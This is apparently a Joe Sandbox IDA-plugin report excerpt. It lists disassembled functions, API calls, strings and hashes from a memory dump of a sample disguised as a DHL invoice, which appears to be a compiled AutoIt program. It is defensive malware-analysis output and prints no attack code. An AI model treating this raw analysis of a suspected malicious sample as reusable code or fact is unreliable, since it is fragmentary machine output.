Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 4bf3e07cf8625f09250c9a2e893c15c3f621a270dc6366944805a956eeda4d8b
Instruction ID: 60a79ff4e3e2bfc2e2d524c45c768a16dd945b938047669ea48a3bfb71f6fc39
Opcode Fuzzy Hash: 4bf3e07cf8625f09250c9a2e893c15c3f621a270dc6366944805a956eeda4d8b
Instruction Fuzzy Hash: AA610375D1021AEFCF15CFA8D884AAEBBB5FF48710F20851DEA55A7240D770A951CFA0

Function 0127DA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0127DAA1

Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D659
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D66B
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D67D
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D68F
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D6A1
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D6B3
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D6C5
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D6D7
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D6E9
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D6FB
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D70D
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D71F
Part of subcall function 0127D63C: _free.LIBCMT ref: 0127D731

_free.LIBCMT ref: 0127DA96

Part of subcall function 012729C8: HeapFree.KERNEL32(00000000,00000000), ref: 012729DE
Part of subcall function 012729C8: GetLastError.KERNEL32(00000000,?,0127D7D1,00000000,00000000,00000000,00000000,?,0127D7F8,00000000,00000007,00000000,?,0127DBF5,00000000,00000000), ref: 012729F0

_free.LIBCMT ref: 0127DAB8
_free.LIBCMT ref: 0127DACD
_free.LIBCMT ref: 0127DAD8
_free.LIBCMT ref: 0127DAFA
_free.LIBCMT ref: 0127DB0D
_free.LIBCMT ref: 0127DB1B
_free.LIBCMT ref: 0127DB26
_free.LIBCMT ref: 0127DB5E
_free.LIBCMT ref: 0127DB65
_free.LIBCMT ref: 0127DB82
_free.LIBCMT ref: 0127DB9A

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 68058e2faaa5c9004c7a0758bc0946889fd241558d6511dd042ec94ef19a9afd
Instruction ID: 4c0b299a511ccd5dbdf67edba7c4b58b20e398c915408b330dc8414a3079f5ce
Opcode Fuzzy Hash: 68058e2faaa5c9004c7a0758bc0946889fd241558d6511dd042ec94ef19a9afd
Instruction Fuzzy Hash: A931603165430BDFEB22AAB9E844B77BBE9FF10250F245819E649D7191EF31E880C724

Function 012A365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 012A369C
_wcslen.LIBCMT ref: 012A36A7
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 012A3797
GetClassNameW.USER32(?,?,00000400), ref: 012A380C
GetDlgCtrlID.USER32 ref: 012A385D
GetWindowRect.USER32(?,?), ref: 012A3882
GetParent.USER32(?), ref: 012A38A0
ScreenToClient.USER32(00000000), ref: 012A38A7
GetClassNameW.USER32(?,?,00000100), ref: 012A3921
GetWindowTextW.USER32 ref: 012A395D

Strings

%s%u, xrefs: 012A3734

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
String ID: %s%u
API String ID: 4010501982-679674701
Opcode ID: e75cc26a87b418638147ce40eef4be041aae4352134e722acaba6168b37a673c
Instruction ID: 0d9f88fc62b706d34f8e5d0f53953000bb7da4a053af5d338e126351c0652b45
Opcode Fuzzy Hash: e75cc26a87b418638147ce40eef4be041aae4352134e722acaba6168b37a673c
Instruction Fuzzy Hash: 8691B271614707AFD719DF28C884BFABBA8FF44350F808629EA99C2190DB30E955CB91

Function 012A4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 012A4994
GetWindowTextW.USER32 ref: 012A49DA
_wcslen.LIBCMT ref: 012A49EB
CharUpperBuffW.USER32(?,00000000), ref: 012A49F7
_wcsstr.LIBVCRUNTIME ref: 012A4A2C
GetClassNameW.USER32(00000018,?,00000400), ref: 012A4A64
GetWindowTextW.USER32 ref: 012A4A9D
GetClassNameW.USER32(00000018,?,00000400), ref: 012A4AE6
GetClassNameW.USER32(?,?,00000400), ref: 012A4B20
GetWindowRect.USER32(?,?), ref: 012A4B8B

Strings

ThumbnailClass, xrefs: 012A4A6F, 012A4AF1

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: ee8865998fa9babc4fbc89a3b76caae2e26fed17e5d8657ae8c0e69ee0093964
Instruction ID: f43bc3809e5fb46bce52e8412dbe4d4cd4ea8c8de453c11727498d54e5fb2882
Opcode Fuzzy Hash: ee8865998fa9babc4fbc89a3b76caae2e26fed17e5d8657ae8c0e69ee0093964
Instruction Fuzzy Hash: DE91F5714243479FDB05EF18C894FBA7BE8FF84304F484469EE859A086EB70E945CBA1

Function 012D8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01259BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 01259BB2

PostMessageW.USER32 ref: 012D8D5A
GetFocus.USER32 ref: 012D8D6A
GetDlgCtrlID.USER32 ref: 012D8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 012D8E1D
GetMenuItemInfoW.USER32 ref: 012D8ECF
GetMenuItemCount.USER32(?), ref: 012D8EEC
GetMenuItemID.USER32(?,00000000), ref: 012D8EFC
GetMenuItemInfoW.USER32 ref: 012D8F2E
GetMenuItemInfoW.USER32 ref: 012D8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 012D8FA1

Strings

0, xrefs: 012D8E9F

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 78e241b810a7ac24139f147f0f14a8c1b512fff4e5b887af29e8f024f54275fd
Instruction ID: 8a56591c2501ed3bd78a24ebfd6b997835e1d3c85276f5d83754347283f08d0a
Opcode Fuzzy Hash: 78e241b810a7ac24139f147f0f14a8c1b512fff4e5b887af29e8f024f54275fd
Instruction Fuzzy Hash: 7481A1715183029FDB21CF28D884ABB7BE9FB88754F04095DFB9597281D770D900CBA2

Function 012ADC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 012ADC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 012ADC46
_wcslen.LIBCMT ref: 012ADC50
_wcsstr.LIBVCRUNTIME ref: 012ADCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 012ADCBC

Strings

StringFileInfo\, xrefs: 012ADC8F
DefaultLangCodepage, xrefs: 012ADD1F
04090000, xrefs: 012ADCF2
%u.%u.%u.%u, xrefs: 012ADD9A
\VarFileInfo\Translation, xrefs: 012ADCB4

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 2d0222db093ab7f93956690746b183de0734acd492a423f266740e67ec548801
Instruction ID: a4a3b17b875ffaa8c5319ab2f64ff44fa76a7d79956aed45fd445657856bb846
Opcode Fuzzy Hash: 2d0222db093ab7f93956690746b183de0734acd492a423f266740e67ec548801
Instruction Fuzzy Hash: 0F412572A6020A7BEB15B6B5DC46EBF77ACEF66610F40005DFA00E6181EB70DA5097A4

Function 012CCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 012CCC64
RegOpenKeyExW.ADVAPI32 ref: 012CCC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 012CCD48

Part of subcall function 012CCC34: RegCloseKey.ADVAPI32(?), ref: 012CCCAA
Part of subcall function 012CCC34: LoadLibraryA.KERNEL32(advapi32.dll), ref: 012CCCBD
Part of subcall function 012CCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW,?,?,00000000), ref: 012CCCCF
Part of subcall function 012CCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 012CCD05
Part of subcall function 012CCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 012CCD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 012CCCF3

Strings

RegDeleteKeyExW, xrefs: 012CCCC9
advapi32.dll, xrefs: 012CCCB8

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 6160e4c98da2da916ae02c97baa9d81e0f58c0ab63d13078db3c083cdcc562d4
Instruction ID: e40d3db6108c5b337ef4cf8bc368abaf3d31ba68ae3206b0c766b177a63b6ac3
Opcode Fuzzy Hash: 6160e4c98da2da916ae02c97baa9d81e0f58c0ab63d13078db3c083cdcc562d4
Instruction Fuzzy Hash: 8C317271D0112ABBDB318A55DC88EFFBF7CEF05A50F00026DAB05E2244DA749A55DBA0

Function 012B3D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 012B3D40
_wcslen.LIBCMT ref: 012B3D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 012B3D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 012B3DBE
RemoveDirectoryW.KERNEL32(?), ref: 012B3DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 012B3E55
CloseHandle.KERNEL32(00000000), ref: 012B3E60
CloseHandle.KERNEL32(00000000), ref: 012B3E6B

Strings

\??\%s, xrefs: 012B3D5B
:, xrefs: 012B3D82
\, xrefs: 012B3D77

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 881b2c5c11ed3fed7931da04f1059056e2054ec086ae04a4d363a5c38f54fd58
Instruction ID: c4cceda71245052920927d9d03d6fc1c30158d4b6ac8da8ce2df193a4516452d
Opcode Fuzzy Hash: 881b2c5c11ed3fed7931da04f1059056e2054ec086ae04a4d363a5c38f54fd58
Instruction Fuzzy Hash: BD31A17195025AABDB21DBA4DC88FEF37BCFF89740F5041A9F609D6094EB709294CB24

Function 012AE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 012AE6B4

Part of subcall function 0125E551: timeGetTime.WINMM ref: 0125E555

Sleep.KERNEL32(0000000A), ref: 012AE6E1
EnumThreadWindows.USER32 ref: 012AE705
FindWindowExW.USER32 ref: 012AE727
SetActiveWindow.USER32 ref: 012AE746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 012AE754
SendMessageW.USER32(00000010,00000000,00000000), ref: 012AE773
Sleep.KERNEL32(000000FA), ref: 012AE77E
IsWindow.USER32 ref: 012AE78A
EndDialog.USER32 ref: 012AE79B

Strings

BUTTON, xrefs: 012AE719

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 32d32b67195a5ae0b79701c61ef31a49329f7b5ee7da790b94276eae3e2dc3d4
Instruction ID: 40c49c4226a0cb82bb719e2437911d729c766b7838908d0391da594711b531e3
Opcode Fuzzy Hash: 32d32b67195a5ae0b79701c61ef31a49329f7b5ee7da790b94276eae3e2dc3d4
Instruction Fuzzy Hash: 9B218EB0620206AFFB255F34FC8DB263F6DF794758F910829F60182189DBB1AC11CB64

Function 012AE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 012AEA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 012AEA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 012AEA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 012AEA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 012AEAA7

Strings

status PlayMe mode, xrefs: 012AEA58
play PlayMe wait, xrefs: 012AEA91
open , xrefs: 012AEA0C
alias PlayMe, xrefs: 012AEA36
close PlayMe, xrefs: 012AEA6E, 012AEA9B
play PlayMe, xrefs: 012AEAA2

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: e9cc7d1191e91342200a1de0a824a327d7e0989a3122efdd16ef9edb5c152419
Instruction ID: fab3b226af477e55751983bed5d61b8a34bfb0ffac3c27c51560d4cb008f3cb6
Opcode Fuzzy Hash: e9cc7d1191e91342200a1de0a824a327d7e0989a3122efdd16ef9edb5c152419
Instruction Fuzzy Hash: 0A11E771AA025A7BE725E366DC5AEFF6EBCFBD1B04F400429B501A21C4DE600955C5B0

Function 01242CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32 ref: 01242D07
RegisterClassExW.USER32(00000030), ref: 01242D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 01242D42
InitCommonControlsEx.COMCTL32(?), ref: 01242D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 01242D6F
LoadIconW.USER32 ref: 01242D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 01242D94

Strings

TaskbarCreated, xrefs: 01242D37
+, xrefs: 01242CF0
0, xrefs: 01242CE9
AutoIt v3 GUI, xrefs: 01242D23

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 4279dfde5133bf3ea3972777c4da7179c4ee8bd12f6e49dcd224e8cc43c7e23d
Instruction ID: 9ad7a5a4b69c245ba39bf35dbefdb93f180587b1295f3da3d7072ecc1749c958
Opcode Fuzzy Hash: 4279dfde5133bf3ea3972777c4da7179c4ee8bd12f6e49dcd224e8cc43c7e23d
Instruction Fuzzy Hash: 0621D8B5D52318AFDB20DFA4E849BDDBBB9FB08701F00811AF661E6288D7B14554CF91

Function 01258BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 01258F62: InvalidateRect.USER32(?,00000000,00000001), ref: 01258FC5

DestroyWindow.USER32 ref: 01258C81
KillTimer.USER32 ref: 01258D1B
DestroyAcceleratorTable.USER32 ref: 01296973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,01258BBA,00000000,?), ref: 012969A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,01258BBA,00000000,?), ref: 012969B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,01258BBA,00000000), ref: 012969D4
DeleteObject.GDI32(00000000), ref: 012969E6

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 7f48825fb2c6eaaeddbe207af58d9cc9cc0f692d68e168c7e91a8400e8a693fe
Instruction ID: 394bdf64186b3ea43d8582b6aca66144b96429ff5f3bce6f4f4abf08202fe9a6
Opcode Fuzzy Hash: 7f48825fb2c6eaaeddbe207af58d9cc9cc0f692d68e168c7e91a8400e8a693fe
Instruction Fuzzy Hash: 47619F31522702DFEF7A9F2ED588BA97BF6FB40312F04451DEA428A554C3B5A990CF80

Function 01259838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 01259944: GetWindowLongW.USER32(?,000000EB), ref: 01259952

GetSysColor.USER32 ref: 01259862

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: dbabb0f2595208a0cfc4e8bbd2b1a47df74b6072622817cee9987bb8a0d4e60e
Instruction ID: 73fb72eb1ad20778ad2248c9e15acb05dd575cd6fba95cd748bc2c80d7b80d21
Opcode Fuzzy Hash: dbabb0f2595208a0cfc4e8bbd2b1a47df74b6072622817cee9987bb8a0d4e60e
Instruction Fuzzy Hash: 20419B31521651EEEF715F3CE88DBB93BA5AB06324F144619EEA28B2D5D7319882CB10

Function 012A96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0128F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 012A9717
LoadStringW.USER32(00000000,?,0128F7F8,00000001), ref: 012A9720

Part of subcall function 01249CB3: _wcslen.LIBCMT ref: 01249CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0128F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 012A9742
LoadStringW.USER32(00000000,?,0128F7F8,00000001), ref: 012A9745
MessageBoxW.USER32 ref: 012A9866

Strings

%s (%d) : ==> %s: %s %s, xrefs: 012A984A
Error: , xrefs: 012A981D
Line %d (File "%s"):, xrefs: 012A978F
Line %d:, xrefs: 012A97A0
^ ERROR, xrefs: 012A97FB

Memory Dump Source

Source File: 00000000.00000002.348975289.0000000001241000.00000020.00000001.01000000.00000003.sdmp, Offset: 01240000, based on PE: true

Associated: 00000000.00000002.348969579.0000000001240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.00000000012DC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349002184.000000000130C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.349006886.0000000001314000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1240000_COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 1cb20f8cdae7753a591f12b960b3577399753cee3c3566b138a62fb80d653bb8
Instruction ID: 4e8f7b8d8542951a9893af8e815449c9cc4d92eb16551362cb733c9480652ffa
Opcode Fuzzy Hash: 1cb20f8cdae7753a591f12b960b3577399753cee3c3566b138a62fb80d653bb8
